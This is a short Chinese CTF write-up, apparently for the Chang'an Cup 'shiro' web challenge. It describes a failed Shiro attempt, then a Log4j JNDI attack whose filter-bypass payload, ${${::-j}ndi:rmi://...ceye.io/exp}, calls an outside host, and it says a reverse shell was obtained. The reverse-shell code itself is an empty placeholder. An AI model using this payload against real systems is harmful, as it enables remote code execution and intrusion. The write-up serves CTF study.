0
点赞
收藏
分享

微信扫一扫

[长安杯]web-shiro复现

西曲风 2022-01-12 阅读 60
网络安全

长安杯-shiro?复现

浏览器显示是springboot框架
登录伪造shiro,关键词为remeber-me
在这里插入图片描述
shiro直接打,打不进去
springboot还可以写log4j漏洞,测试一下
在这里插入图片描述
jndi被过滤了
进行绕过

${${::-j}ndi:rmi://py2hu7.ceye.io/exp}

在这里插入图片描述
在这里插入图片描述
成功接收到dnslog信息。
构建jndi反弹shell,这里反弹shell的命令需要bypass一下

在这里插入代码片

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
反弹的有点慢,但是可以成功反弹shell并拿取flag。

举报

相关推荐

0 条评论